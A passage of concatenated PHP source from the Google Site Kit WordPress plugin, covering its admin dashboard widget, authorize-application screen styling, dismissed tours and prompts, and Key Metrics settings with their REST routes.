$pointer->get_title(), $kses_title ), 'data-content' => wp_kses( $content, $kses_content ), 'data-position' => wp_json_encode( $pointer->get_position() ), ) ); } } <?php /** * Class Google\Site_Kit\Core\Admin\Dashboard * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Assets\Assets; use Google\Site_Kit\Core\Authentication\Authentication; use Google\Site_Kit\Core\Modules\Modules; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\Util\Requires_Javascript_Trait; /** * Class to handle all wp-admin Dashboard related functionality. * * @since 1.0.0 * @access private * @ignore */ final class Dashboard { use Requires_Javascript_Trait; /** * Plugin context. * * @since 1.0.0 * @var Context */ private $context; /** * Assets Instance. * * @since 1.0.0 * @var Assets */ private $assets; /** * Modules instance. * * @since 1.7.0 * @var Modules */ private $modules; /** * Authentication instance. * * @since 1.120.0 * @var Authentication */ private $authentication; /** * Constructor. * * @since 1.0.0 * * @param Context $context Plugin context. * @param Assets $assets Optional. Assets API instance. Default is a new instance. * @param Modules $modules Optional. Modules instance. Default is a new instance. */ public function __construct( Context $context, ?Assets $assets = null, ?Modules $modules = null ) { $this->context = $context; $this->assets = $assets ?: new Assets( $this->context ); $this->modules = $modules ?: new Modules( $this->context ); $this->authentication = new Authentication( $this->context ); } /** * Registers functionality through WordPress hooks. * * @since 1.0.0 */ public function register() { add_action( 'wp_dashboard_setup', function () { $this->add_widgets(); } ); } /** * Add a Site Kit by Google widget to the WordPress admin dashboard. * * @since 1.0.0 */ private function add_widgets() { if ( ! current_user_can( Permissions::VIEW_WP_DASHBOARD_WIDGET ) ) { return; } // Enqueue styles. $this->assets->enqueue_asset( 'googlesitekit-wp-dashboard-css' ); // Enqueue scripts. $this->assets->enqueue_asset( 'googlesitekit-wp-dashboard' ); $this->modules->enqueue_assets(); wp_add_dashboard_widget( 'google_dashboard_widget', __( 'Site Kit Summary', 'google-site-kit' ), function () { $this->render_googlesitekit_wp_dashboard(); } ); } /** * Render the Site Kit WordPress Dashboard widget. * * @since 1.0.0 * @since 1.120.0 Added the `data-view-only` attribute. */ private function render_googlesitekit_wp_dashboard() { $active_modules = $this->modules->get_active_modules(); $analytics_connected = isset( $active_modules['analytics-4'] ) && $active_modules['analytics-4']->is_connected(); $search_console_connected = isset( $active_modules['search-console'] ) && $active_modules['search-console']->is_connected(); $is_view_only = ! $this->authentication->is_authenticated(); $can_view_shared_analytics = current_user_can( Permissions::READ_SHARED_MODULE_DATA, 'analytics-4' ); $can_view_shared_search_console = current_user_can( Permissions::READ_SHARED_MODULE_DATA, 'search-console' ); $display_analytics_data = ( ! $is_view_only && $analytics_connected ) || ( $is_view_only && $can_view_shared_analytics ); $display_search_console_data = ( ! $is_view_only && $search_console_connected ) || ( $is_view_only && $can_view_shared_search_console ); $class_names = array(); if ( $analytics_connected && $display_analytics_data ) { $class_names[] = 'googlesitekit-wp-dashboard-analytics_active_and_connected'; } if ( $search_console_connected && $display_search_console_data ) { $class_names[] = 'googlesitekit-wp-dashboard-search_console_active_and_connected'; } if ( ! $analytics_connected && ! $is_view_only ) { $class_names[] = 'googlesitekit-wp-dashboard-analytics-activate-cta'; } $class_names = implode( ' ', $class_names ); $this->render_noscript_html(); ?> <div id="js-googlesitekit-wp-dashboard" data-view-only="<?php echo esc_attr( $is_view_only ); ?>" class="googlesitekit-plugin <?php echo esc_attr( $class_names ); ?>"> <div class="googlesitekit-wp-dashboard googlesitekit-wp-dashboard-loading"> <?php $this->render_loading_container( 'googlesitekit-wp-dashboard__cta' ); ?> <div class="googlesitekit-wp-dashboard-stats"> <?php if ( $display_analytics_data ) { $this->render_loading_container( 'googlesitekit-wp-dashboard-loading__can_view_analytics' ); } if ( $display_search_console_data ) { $this->render_loading_container( 'googlesitekit-wp-dashboard-loading__search_console_active_and_connected' ); } if ( ! $analytics_connected && ! $is_view_only ) { $this->render_loading_container( 'googlesitekit-wp-dashboard-stats__cta' ); } if ( $display_analytics_data ) { $this->render_loading_container( 'googlesitekit-unique-visitors-chart-widget' ); $this->render_loading_container( 'googlesitekit-search-console-widget' ); } ?> </div> </div> </div> <?php } /** * Render the loading container when data is not available and being fetched. * * @since 1.144.0 * @param string $class_names Class names to add to the container. * @return void */ private function render_loading_container( $class_names ) { ?> <div class="googlesitekit-preview-block <?php echo esc_attr( $class_names ); ?>"> <div class="googlesitekit-preview-block__wrapper"></div> </div> <?php } } <?php /** * Class Google\Site_Kit\Core\Admin\Authorize_Application * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Assets\Assets; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; /** * Class to handle all wp-admin Authorize Application related functionality. * * @since 1.126.0 * @access private * @ignore */ final class Authorize_Application { use Method_Proxy_Trait; /** * Plugin context. * * @since 1.126.0 * @var Context */ private $context; /** * Assets instance. * * @since 1.126.0 * @var Assets */ private $assets; /** * Constructor. * * @since 1.126.0 * * @param Context $context Plugin context. * @param Assets $assets Optional. Assets API instance. Default is a new instance. */ public function __construct( Context $context, ?Assets $assets = null ) { $this->context = $context; $this->assets = $assets ?: new Assets( $this->context ); } /** * Registers functionality through WordPress hooks. * * @since 1.126.0 */ public function register() { add_action( 'admin_enqueue_scripts', $this->get_method_proxy( 'enqueue_assets' ) ); add_action( 'admin_footer', $this->get_method_proxy( 'render_custom_footer' ) ); } /** * Checks if the current screen is the Authorize Application screen. * * @since 1.126.0 * * @return bool True if the current screen is the Authorize Application screen, false otherwise. */ protected function is_authorize_application_screen() { $current_screen = function_exists( 'get_current_screen' ) ? get_current_screen() : null; if ( $current_screen instanceof \WP_Screen && 'authorize-application' === $current_screen->id ) { return true; } return false; } /** * Checks if the current service is a Google service. * * @since 1.126.0 * * @return bool True if the current service is a Google service, false otherwise. */ protected function is_google_service() { $success_url = isset( $_GET['success_url'] ) ? esc_url_raw( wp_unslash( $_GET['success_url'] ) ) : ''; // phpcs:ignore WordPress.Security.NonceVerification $success_url = sanitize_text_field( $success_url ); $parsed_url = wp_parse_url( $success_url ); if ( empty( $parsed_url['host'] ) ) { return false; } // Check if the domain is a '*.google.com' domain. return preg_match( '/\.google\.com$/', $parsed_url['host'] ) === 1; } /** * Enqueues assets for the Authorize Application screen. * * @since 1.126.0 */ private function enqueue_assets() { if ( $this->is_authorize_application_screen() && $this->is_google_service() ) { $this->assets->enqueue_asset( 'googlesitekit-authorize-application-css' ); } } /** * Renders custom footer for the Authorize Application screen if the service is a Google service. * * @since 1.126.0 */ private function render_custom_footer() { if ( $this->is_authorize_application_screen() && $this->is_google_service() ) { echo '<div class="googlesitekit-authorize-application__footer"><p>' . esc_html__( 'Powered by Site Kit', 'google-site-kit' ) . '</p></div>'; } } } <?php /** * Class Google\Site_Kit\Core\Admin\Plugin_Action_Links * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Admin; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Permissions\Permissions; /** * Class for managing plugin action links. * * @since 1.41.0 * @access private * @ignore */ class Plugin_Action_Links { /** * Plugin context. * * @since 1.41.0 * @var Context */ private $context; /** * Constructor. * * @since 1.41.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Registers functionality through WordPress hooks. * * @since 1.41.0 */ public function register() { add_filter( 'plugin_action_links_' . GOOGLESITEKIT_PLUGIN_BASENAME, function ( $links ) { if ( current_user_can( Permissions::MANAGE_OPTIONS ) ) { $settings_link = sprintf( '<a href="%s">%s</a>', esc_url( $this->context->admin_url( 'settings' ) ), esc_html__( 'Settings', 'google-site-kit' ) ); array_unshift( $links, $settings_link ); } return $links; } ); } } <?php /** * Class Google\Site_Kit\Core\Feature_Tours\Dismissed_Tours * * @package Google\Site_Kit\Core\Feature_Tours * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Feature_Tours; use Closure; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class for representing a user's dismissed feature tours. * * @since 1.27.0 * @access private * @ignore */ class Dismissed_Tours extends User_Setting { /** * The user option name for this setting. * * @note This option is prefixed differently * so that it will persist across disconnect/reset. */ const OPTION = 'googlesitekitpersistent_dismissed_tours'; /** * Adds one or more tours to the list of dismissed tours. * * @since 1.27.0 * * @param string ...$tour_slug The tour identifier to dismiss. */ public function add( ...$tour_slug ) { $value = array_merge( $this->get(), $tour_slug ); $this->set( $value ); } /** * Gets the value of the setting. * * @since 1.27.0 * * @return array Value set for the option, or default if not set. */ public function get() { $value = parent::get(); return is_array( $value ) ? $value : array(); } /** * Gets the expected value type. * * @since 1.27.0 * * @return string The type name. */ protected function get_type() { return 'array'; } /** * Gets the default value. * * @since 1.27.0 * * @return array The default value. */ protected function get_default() { return array(); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.27.0 * * @return Closure */ protected function get_sanitize_callback() { return function ( $value ) { return is_array( $value ) ? array_values( array_unique( $value ) ) : $this->get(); }; } } <?php /** * Class Google\Site_Kit\Core\Feature_Tours\REST_Feature_Tours_Controller * * @package Google\Site_Kit\Core\Feature_Tours * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Feature_Tours; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_Error; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling feature tour rest routes. * * @since 1.27.0 * @access private * @ignore */ class REST_Feature_Tours_Controller { /** * Dismissed_Tours instance. * * @since 1.27.0 * @var Dismissed_Tours */ protected $dismissed_tours; /** * Constructor. * * @since 1.27.0 * * @param Dismissed_Tours $dismissed_tours Dismissed tours instance. */ public function __construct( Dismissed_Tours $dismissed_tours ) { $this->dismissed_tours = $dismissed_tours; } /** * Registers functionality through WordPress hooks. * * @since 1.27.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { $feature_tour_routes = array( '/' . REST_Routes::REST_ROOT . '/core/user/data/dismissed-tours', ); return array_merge( $paths, $feature_tour_routes ); } ); } /** * Gets REST route instances. * * @since 1.27.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_dismiss_tour = function () { return current_user_can( Permissions::AUTHENTICATE ) || current_user_can( Permissions::VIEW_SHARED_DASHBOARD ); }; return array( new REST_Route( 'core/user/data/dismissed-tours', array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->dismissed_tours->get() ); }, 'permission_callback' => $can_dismiss_tour, ) ), new REST_Route( 'core/user/data/dismiss-tour', array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function ( WP_REST_Request $request ) { $data = $request['data']; if ( empty( $data['slug'] ) ) { return new WP_Error( 'missing_required_param', /* translators: %s: Missing parameter name */ sprintf( __( 'Request parameter is empty: %s.', 'google-site-kit' ), 'slug' ), array( 'status' => 400 ) ); } $this->dismissed_tours->add( $data['slug'] ); return new WP_REST_Response( $this->dismissed_tours->get() ); }, 'permission_callback' => $can_dismiss_tour, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\Feature_Tours\Feature_Tours * * @package Google\Site_Kit\Core\Feature_Tours * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Feature_Tours; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\User_Options; /** * Class for handling feature tours. * * @since 1.27.0 * @access private * @ignore */ class Feature_Tours { /** * Dismissed_Tours instance. * * @since 1.27.0 * @var Dismissed_Tours */ protected $dismissed_tours; /** * REST_Feature_Tours_Controller instance. * * @since 1.27.0 * @var REST_Feature_Tours_Controller */ protected $rest_controller; /** * Constructor. * * @since 1.27.0 * * @param Context $context Plugin context. * @param User_Options $user_options Optional. User option API. Default is a new instance. */ public function __construct( Context $context, ?User_Options $user_options = null ) { $this->dismissed_tours = new Dismissed_Tours( $user_options ?: new User_Options( $context ) ); $this->rest_controller = new REST_Feature_Tours_Controller( $this->dismissed_tours ); } /** * Registers functionality through WordPress hooks. * * @since 1.27.0 */ public function register() { $this->dismissed_tours->register(); $this->rest_controller->register(); } } <?php /** * Class Google\Site_Kit\Core\Prompts\Dismissed_Prompts * * @package Google\Site_Kit\Core\Prompts * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Prompts; use Google\Site_Kit\Core\Storage\User_Setting; /** * Class for representing a user's dismissed prompts. * * @since 1.121.0 * @access private * @ignore */ class Dismissed_Prompts extends User_Setting { /** * The user option name for this setting. * * @note This option is prefixed differently so that it will persist across disconnect/reset. */ const OPTION = 'googlesitekitpersistent_dismissed_prompts'; const DISMISS_PROMPT_PERMANENTLY = 0; /** * Adds one prompt to the list of dismissed prompts or updates the triggered count. * * @since 1.121.0 * * @param string $prompt Prompt to dismiss. * @param int $expires_in_seconds TTL for the prompt. */ public function add( $prompt, $expires_in_seconds = self::DISMISS_PROMPT_PERMANENTLY ) { $prompts = $this->get(); if ( array_key_exists( $prompt, $prompts ) ) { $prompts[ $prompt ]['expires'] = $expires_in_seconds ? time() + $expires_in_seconds : 0; $prompts[ $prompt ]['count'] = $prompts[ $prompt ]['count'] + 1; } else { $prompts[ $prompt ] = array( 'expires' => $expires_in_seconds ? time() + $expires_in_seconds : 0, 'count' => 1, ); } $this->set( $prompts ); } /** * Removes one or more prompts from the list of dismissed prompts. * * @since 1.121.0 * * @param string $prompt Item to remove. */ public function remove( $prompt ) { $prompts = $this->get(); // If the prompt is not in dismissed prompts, there's nothing to do. if ( ! array_key_exists( $prompt, $prompts ) ) { return; } unset( $prompts[ $prompt ] ); $this->set( $prompts ); } /** * Gets the value of the setting. * * @since 1.121.0 * * @return array Value set for the option, or default if not set. */ public function get() { $value = parent::get(); return is_array( $value ) ? $value : $this->get_default(); } /** * Gets the expected value type. * * @since 1.121.0 * * @return string The type name. */ protected function get_type() { return 'array'; } /** * Gets the default value. * * @since 1.121.0 * * @return array The default value. */ protected function get_default() { return array(); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.121.0 * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return function ( $prompts ) { if ( ! is_array( $prompts ) ) { return $this->get_default(); } $sanitized_prompts = array(); foreach ( $prompts as $prompt => $data ) { if ( is_array( $data ) && isset( $data['expires'], $data['count'] ) && is_numeric( $data['expires'] ) && is_numeric( $data['count'] ) ) { $sanitized_prompts[ $prompt ] = array( 'expires' => $data['expires'], 'count' => $data['count'], ); } } return $sanitized_prompts; }; } } <?php /** * Class Google\Site_Kit\Core\Prompts\Prompts * * @package Google\Site_Kit\Core\Prompts * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Prompts; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\User_Options; /** * Class for handling prompts. * * @since 1.121.0 * @access private * @ignore */ class Prompts { /** * Dismissed_Prompts instance. * * @since 1.121.0 * @var Dismissed_Prompts */ protected $dismissed_prompts; /** * REST_Prompts_Controller instance. * * @since 1.121.0 * @var REST_Prompts_Controller */ protected $rest_controller; /** * Constructor. * * @since 1.121.0 * * @param Context $context Plugin context. * @param User_Options $user_options Optional. User option API. Default is a new instance. */ public function __construct( Context $context, ?User_Options $user_options = null ) { $this->dismissed_prompts = new Dismissed_Prompts( $user_options ?: new User_Options( $context ) ); $this->rest_controller = new REST_Prompts_Controller( $this->dismissed_prompts ); } /** * Gets the reference to the Dismissed_Prompts instance. * * @since 1.121.0 * * @return Dismissed_Prompts An instance of the Dismissed_Prompts class. */ public function get_dismissed_prompts() { return $this->dismissed_prompts; } /** * Registers functionality through WordPress hooks. * * @since 1.121.0 */ public function register() { $this->dismissed_prompts->register(); $this->rest_controller->register(); } } <?php /** * Class Google\Site_Kit\Core\Prompts\REST_Prompts_Controller * * @package Google\Site_Kit\Core\Prompts * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Prompts; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_Error; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling dismissed prompts rest routes. * * @since 1.121.0 * @access private * @ignore */ class REST_Prompts_Controller { /** * Dismissed_Prompts instance. * * @since 1.121.0 * @var Dismissed_Prompts */ protected $dismissed_prompts; /** * Constructor. * * @since 1.121.0 * * @param Dismissed_Prompts $dismissed_prompts Dismissed prompts instance. */ public function __construct( Dismissed_Prompts $dismissed_prompts ) { $this->dismissed_prompts = $dismissed_prompts; } /** * Registers functionality through WordPress hooks. * * @since 1.121.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/dismissed-prompts', ) ); } ); } /** * Gets REST route instances. * * @since 1.121.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_dismiss_prompt = function () { return current_user_can( Permissions::VIEW_SPLASH ) || current_user_can( Permissions::VIEW_DASHBOARD ); }; return array( new REST_Route( 'core/user/data/dismissed-prompts', array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->dismissed_prompts->get() ); }, 'permission_callback' => $can_dismiss_prompt, ) ), new REST_Route( 'core/user/data/dismiss-prompt', array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function ( WP_REST_Request $request ) { $data = $request['data']; if ( empty( $data['slug'] ) ) { return new WP_Error( 'missing_required_param', /* translators: %s: Missing parameter name */ sprintf( __( 'Request parameter is empty: %s.', 'google-site-kit' ), 'slug' ), array( 'status' => 400 ) ); } $expiration = Dismissed_Prompts::DISMISS_PROMPT_PERMANENTLY; if ( isset( $data['expiration'] ) && intval( $data['expiration'] ) > 0 ) { $expiration = $data['expiration']; } $this->dismissed_prompts->add( $data['slug'], $expiration ); return new WP_REST_Response( $this->dismissed_prompts->get() ); }, 'permission_callback' => $can_dismiss_prompt, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\Dismissals\REST_Key_Metrics_Controller * * @package Google\Site_Kit\Core\Key_Metrics * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Key_Metrics; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_Error; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling rest routes for Key Metrics settings. * * @since 1.93.0 * @access private * @ignore */ class REST_Key_Metrics_Controller { /** * Key_Metrics_Settings instance. * * @since 1.93.0 * @var Key_Metrics_Settings */ protected $settings; /** * Key_Metrics_Setup_Completed_By instance. * * @since 1.113.0 * @var Key_Metrics_Setup_Completed_By */ protected $key_metrics_setup_completed_by; /** * Constructor. * * @since 1.93.0 * * @param Key_Metrics_Settings $settings Key Metrics settings. * @param Key_Metrics_Setup_Completed_By $key_metrics_setup_completed_by Site-wide option to check if key metrics set up is complete. */ public function __construct( Key_Metrics_Settings $settings, Key_Metrics_Setup_Completed_By $key_metrics_setup_completed_by ) { $this->settings = $settings; $this->key_metrics_setup_completed_by = $key_metrics_setup_completed_by; } /** * Registers functionality through WordPress hooks. * * @since 1.93.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/user/data/key-metrics', ) ); } ); } /** * Gets REST route instances. * * @since 1.93.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $has_capabilities = function () { return current_user_can( Permissions::VIEW_SPLASH ) || current_user_can( Permissions::VIEW_DASHBOARD ); }; return array( new REST_Route( 'core/user/data/key-metrics', array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->settings->get() ); }, 'permission_callback' => $has_capabilities, ) ), new REST_Route( 'core/user/data/key-metrics', array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function ( WP_REST_Request $request ) { // Data is already validated because we've defined the detailed schema. // If the incoming data param doesn't match the schema, then WordPress // will automatically return the rest_invalid_param error and we will // never get to here. $data = $request->get_param( 'data' ); $settings = $data['settings']; if ( isset( $settings['widgetSlugs'] ) ) { $num_widgets = count( $settings['widgetSlugs'] ); if ( ! $num_widgets ) { return new WP_Error( 'rest_invalid_param', __( 'Selected metrics cannot be empty.', 'google-site-kit' ), array( 'status' => 400 ) ); } // Additional check is needed to ensure that we have no more than 4 widget // slugs provided. This is required until we drop support for WP versions below 5.5.0, after // which we can solely rely on `maxItems` in the schema validation (see below). // See https://github.com/WordPress/WordPress/blob/965fcddcf68cf4fd122ae24b992e242dfea1d773/wp-includes/rest-api.php#L1922-L1925. $max_num_widgets = 8; if ( $num_widgets > $max_num_widgets ) { return new WP_Error( 'rest_invalid_param', __( 'No more than 4 key metrics can be selected.', 'google-site-kit' ), array( 'status' => 400 ) ); } $key_metrics_setup_already_done_by_user = $this->key_metrics_setup_completed_by->get(); if ( empty( $key_metrics_setup_already_done_by_user ) ) { $current_user_id = get_current_user_id(); $this->key_metrics_setup_completed_by->set( $current_user_id ); } } $this->settings->merge( $data['settings'] ); return new WP_REST_Response( $this->settings->get() ); }, 'permission_callback' => $has_capabilities, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'settings' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'isWidgetHidden' => array( 'type' => 'boolean', 'required' => true, ), 'widgetSlugs' => array( 'type' => 'array', 'required' => false, 'maxItems' => 8, 'items' => array( 'type' => 'string', ), ), ), ), ), ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\Key_Metrics\Key_Metrics_Setup_New * * @package Google\Site_Kit\Core\Key_Metrics * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Key_Metrics; use Google\Site_Kit\Core\Storage\Transients; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; /** * Class for handling Key_Metrics_Setup_New state. * * @since 1.115.0 * @access private * @ignore */ class Key_Metrics_Setup_New { use Method_Proxy_Trait; const TRANSIENT = 'googlesitekit_key_metrics_setup_new'; /** * Transients instance. * * @var Transients */ private $transients; /** * Constructor. * * @since 1.115.0 * * @param Transients $transients Transients instance. */ public function __construct( Transients $transients ) { $this->transients = $transients; } /** * Registers functionality through WordPress hooks. * * @since 1.115.0 */ public function register() { add_action( 'add_option_' . Key_Metrics_Setup_Completed_By::OPTION, $this->get_method_proxy( 'mark_setup_completed' ), 10, 2 ); add_filter( 'googlesitekit_inline_base_data', $this->get_method_proxy( 'inline_js_base_data' ) ); } /** * Marks Key Metrics setup as just completed for a limited period of time. * * @since 1.115.0 * * @param string $option Key_Metrics_Setup_Completed_By option name. * @param mixed $value Option value added. */ protected function mark_setup_completed( $option, $value ) { if ( $value ) { $this->transients->set( self::TRANSIENT, true, 2 * WEEK_IN_SECONDS ); } } /** * Extends base data with setup new state. * * @since 1.115.0 * * @param array $data Inline base data. * @return array */ protected function inline_js_base_data( $data ) { $data['keyMetricsSetupNew'] = (bool) $this->transients->get( self::TRANSIENT ); return $data; } } <?php /** * Class Google\Site_Kit\Core\Key_Metrics\Key_Metrics * * @package Google\Site_Kit\Core\Key_Metrics * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Key_Metrics; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\Transients; use Google\Site_Kit\Core\Storage\User_Options; use Google\Site_Kit\Core\Tracking\Feature_Metrics_Trait; use Google\Site_Kit\Core\Tracking\Provides_Feature_Metrics; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; /** * Class for handling Key_Metrics. * * @since 1.93.0 * @access private * @ignore */ class Key_Metrics implements Provides_Feature_Metrics { use Method_Proxy_Trait; use Feature_Metrics_Trait; /** * Key_Metrics_Settings instance. * * @since 1.93.0 * @var Key_Metrics_Settings */ protected $key_metrics_settings; /** * Key_Metrics_Setup_Completed_By instance. * * @since 1.113.0 * @var Key_Metrics_Setup_Completed_By */ protected $key_metrics_setup_completed_by; /** * REST_Key_Metrics_Controller instance. * * @since 1.93.0 * @var REST_Key_Metrics_Controller */ protected $rest_controller; /** * Key_Metrics_Setup_New instance. * * @since 1.115.0 * @var Key_Metrics_Setup_New */ protected $key_metrics_setup_new; /** * Constructor. * * @since 1.93.0 * * @param Context $context Plugin context. * @param User_Options $user_options Optional. User option API. Default is a new instance. * @param Options $options Optional. Option API instance. Default is a new instance. */ public function __construct( Context $context, ?User_Options $user_options = null, ?Options $options = null ) { $this->key_metrics_settings = new Key_Metrics_Settings( $user_options ?: new User_Options( $context ) ); $this->key_metrics_setup_completed_by = new Key_Metrics_Setup_Completed_By( $options ?: new Options( $context ) ); $this->key_metrics_setup_new = new Key_Metrics_Setup_New( new Transients( $context ) ); $this->rest_controller = new REST_Key_Metrics_Controller( $this->key_metrics_settings, $this->key_metrics_setup_completed_by ); } /** * Registers functionality through WordPress hooks. * * @since 1.93.0 */ public function register() { $this->key_metrics_settings->register(); $this->key_metrics_setup_completed_by->register(); $this->key_metrics_setup_new->register(); $this->rest_controller->register(); $this->register_feature_metrics(); add_filter( 'googlesitekit_inline_base_data', $this->get_method_proxy( 'inline_js_base_data' ) ); } /** * Adds the status of the Key Metrics widget setup to the inline JS data. * * @since 1.108.0 * @since 1.113.0 Add keyMetricsSetupCompletedBy (id) instead of keyMetricsSetupCompleted boolean. * * @param array $data Inline JS data. * @return array Filtered $data. */ private function inline_js_base_data( $data ) { $data['keyMetricsSetupCompletedBy'] = (int) $this->key_metrics_setup_completed_by->get(); return $data; } /** * Gets an array of internal feature metrics. * * @since 1.163.0 * * @return array */ public function get_feature_metrics() { return array( 'km_setup' => (bool) $this->key_metrics_setup_completed_by->get(), ); } } <?php /** * Class Google\Site_Kit\Core\Key_Metrics\Key_Metrics_Setup_Completed_By * * @package Google\Site_Kit\Core\Key_Metrics * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Key_Metrics; use Google\Site_Kit\Core\Storage\Setting; /** * Class for handling the setup completion state of Key Metrics. * * @since 1.113.0 * @access private * @ignore */ class Key_Metrics_Setup_Completed_By extends Setting { /** * The option_name for this setting. */ const OPTION = 'googlesitekit_key_metrics_setup_completed_by'; /** * Gets the expected value type. * * @since 1.113.0 * * @return string The type name. */ protected function get_type() { return 'integer'; } } <?php /** * Class Google\Site_Kit\Core\Key_Metrics\Key_Metrics_Settings * * @package Google\Site_Kit\Core\Key_Metrics * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Key_Metrics; use Google\Site_Kit\Core\Storage\User_Setting; use Google\Site_Kit\Core\Util\Sanitize; /** * Class to store user key metrics settings. * * @since 1.93.0 * @access private * @ignore */ class Key_Metrics_Settings extends User_Setting { /** * The user option name for this setting. */ const OPTION = 'googlesitekit_key_metrics_settings'; /** * Gets the expected value type. * * @since 1.93.0 * * @return string The type name. */ protected function get_type() { return 'object'; } /** * Gets the default value. * * @since 1.93.0 * * @return array The default value. */ protected function get_default() { return array( 'widgetSlugs' => array(), 'isWidgetHidden' => false, ); } /** * Merges an array of settings to update. * * @since 1.93.0 * * @param array $partial Partial settings array to save. * @return bool True on success, false on failure. */ public function merge( array $partial ) { $settings = $this->get(); $partial = array_filter( $partial, function ( $value ) { return null !== $value; } ); $allowed_settings = array( 'widgetSlugs' => true, 'isWidgetHidden' => true, ); $updated = array_intersect_key( $partial, $allowed_settings ); return $this->set( array_merge( $settings, $updated ) ); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.93.0 * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return function ( $settings ) { if ( ! is_array( $settings ) ) { return array(); } $sanitized_settings = array(); if ( isset( $settings['widgetSlugs'] ) ) { $sanitized_settings['widgetSlugs'] 